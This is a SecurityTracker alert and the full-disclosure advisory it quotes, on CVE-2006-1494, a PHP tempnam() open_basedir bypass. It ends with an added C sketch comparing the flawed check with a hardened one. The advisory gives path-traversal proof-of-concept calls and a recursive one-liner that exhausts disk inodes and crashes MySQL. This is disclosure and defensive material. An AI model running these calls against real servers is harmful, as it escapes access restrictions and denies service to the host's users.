PHP tempnam() Argument Error Lets Users Bypass open_basedir Restrictions

SecurityTracker Alert ID: 1015881
SecurityTracker URL: http://securitytracker.com/id/1015881
CVE Reference: CVE-2006-1494
Date: Apr 9 2006
Impact: Denial of service via local system, Modification of system information, Modification of user information
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): 4.4.2, 5.1.2
Description:
A vulnerability was reported in PHP in the tempnam() function. A user can bypass open_basedir restrictions.
A user with the privileges to load arbitrary PHP code can call tempnam() with a specially crafted value for its second (prefix) argument. When the function is executed, the system will create a temporary file in an arbitrary directory (outside of the open_basedir specification, but still subject to file system permissions).
This can be exploited to create numerous files on the target system and potentially deny service on the target system.
A demonstration exploit function is provided:
tempnam("/home", "../../../../../../tmp/cx");
Maksymilian Arciemowicz (cXIb8O3) of SecurityReason.com reported this vulnerability.
The original advisory is available at:
http://securityreason.com/achievement_securityalert/36

Impact:
A user with the ability to load arbitrary PHP code can bypass open_basedir restrictions and create files on the target system.

Solution:
The vendor has issued a fixed version (5.1.3RC3), available at:
http://www.php.net/downloads.php

Vendor URL: www.php.net/

Cause:
Access control error

Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
Message History:
This archive entry has one or more follow-up message(s) listed below.

Source Message Contents

Date: Sat, 8 Apr 2006 21:41:54 +0200
Subject: [Full-disclosure] tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2
Source: http://securityreason.com/achievement_securityalert/36
[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 26.3.2006
- Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494
--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write dynamically
generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
tempnam -- Create file with unique file name
--- 1. tempnam() open_basedir bypass ---
The tempnam() function requires 2 args.
http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )
So, if we have open_basedir set to /home, we can't create a file above the /home directory.
In ext/standard/file.c (PHP 4.4.2)
--- 550-578 ---
PHP_FUNCTION(tempnam)
{
    pval **arg1, **arg2;
    char *d;
    char *opened_path;
    char p[64];
    FILE *fp;

    if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
        WRONG_PARAM_COUNT;
    }
    convert_to_string_ex(arg1);
    convert_to_string_ex(arg2);

    /* open_basedir is checked against arg1 (dir) only */
    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }

    d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));
    /* arg2 (prefix) is copied verbatim, including any "../" sequences */
    strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p));

    if ((fp = php_open_temporary_file(d, p, &opened_path TSRMLS_CC))) {
        fclose(fp);
        RETVAL_STRING(opened_path, 0);
    } else {
        RETVAL_FALSE;
    }
    efree(d);
}
--- 550-578 ---
    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }
Where is arg2?
So we can write an exploit like:
tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd");
tempnam("/home", "../../../../../../tmp/cx");
etc.
It is a low issue, but you can try to create a lot of files and overload the inodes on the HD. I have one partition:
/var /dev/ad0s1e 1.0G 97M 858M 10% /var <- Space (B)
/dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var <- INODES
where mysql and apache try to create some files. When we overload the free inodes, the system has big problems with apache and mysql.
Example:
cxib# php -r 'function cx(){ tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();'
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
/var: create/symlink failed, no inodes free
... etc
/usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o' (Errcode: 13)
And mysql die()!
--- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS
--- 3. Greets ---
For: sp3x
and
p_e_a, pi3, eax, Infospec ;]
--- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
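As an added illustration (not code from PHP or from the advisory author), the C model below captures the root cause described in the alert and in the advisory: the 4.4.2 logic validates only the dir argument against open_basedir, so a prefix containing "../" escapes the base directory, while a hardened variant normalizes dir joined with prefix and validates the path that would really be created. The function names, the lexical normalizer and the /home base directory are assumptions for the demonstration; the hardened check is illustrative and is not PHP's actual patch.

```c
#include <stdio.h>
#include <string.h>
/* Added example: names and the lexical normalizer are assumptions, not PHP code. */

/* Lexically normalize an absolute path: collapse "//" and ".", resolve "..",
 * never climbing above "/". No file system access. Returns 0 on success. */
static int normalize_path(const char *in, char *out, size_t outsz) {
    char buf[1024]; size_t len = 0; const char *p = in;
    if (*in != '/' || strlen(in) >= sizeof buf) return -1;
    buf[len++] = '/';
    while (*p) {
        while (*p == '/') p++;                     /* skip repeated separators */
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t n = (size_t)(p - start);
        if (n == 0 || (n == 1 && start[0] == '.')) continue;
        if (n == 2 && start[0] == '.' && start[1] == '.') {   /* pop one component */
            if (len > 1) { len--; while (len > 1 && buf[len - 1] != '/') len--; }
            continue;                              /* at root ".." is a no-op */
        }
        if (len + n + 1 >= sizeof buf) return -1;
        if (buf[len - 1] != '/') buf[len++] = '/';
        memcpy(buf + len, start, n); len += n;
    }
    if (len > 1 && buf[len - 1] == '/') len--;     /* drop trailing slash */
    if (len + 1 > outsz) return -1;
    memcpy(out, buf, len); out[len] = '\0';
    return 0;
}

/* 1 if the normalized path is basedir itself or lies below it, else 0. */
static int within_basedir(const char *path, const char *basedir) {
    char p[1024], b[1024];
    if (normalize_path(path, p, sizeof p) || normalize_path(basedir, b, sizeof b)) return 0;
    size_t bl = strlen(b);
    if (strncmp(p, b, bl) != 0) return 0;
    return bl == 1 || p[bl] == '\0' || p[bl] == '/';
}

/* Models PHP 4.4.2 tempnam(): open_basedir is checked against dir only. */
int tempnam_check_vulnerable(const char *dir, const char *prefix, const char *basedir) {
    (void)prefix;                                  /* prefix is never inspected */
    return within_basedir(dir, basedir);
}

/* Hardened variant (illustrative, not PHP's patch): validate dir joined with prefix. */
int tempnam_check_fixed(const char *dir, const char *prefix, const char *basedir) {
    char joined[2048];
    if (snprintf(joined, sizeof joined, "%s/%s", dir, prefix) >= (int)sizeof joined) return 0;
    return within_basedir(joined, basedir);
}
```

With open_basedir modelled as /home, the advisory's call tempnam("/home", "../../../../../../tmp/cx") passes the dir-only check but is rejected once the resulting path /tmp/cx is the thing being validated.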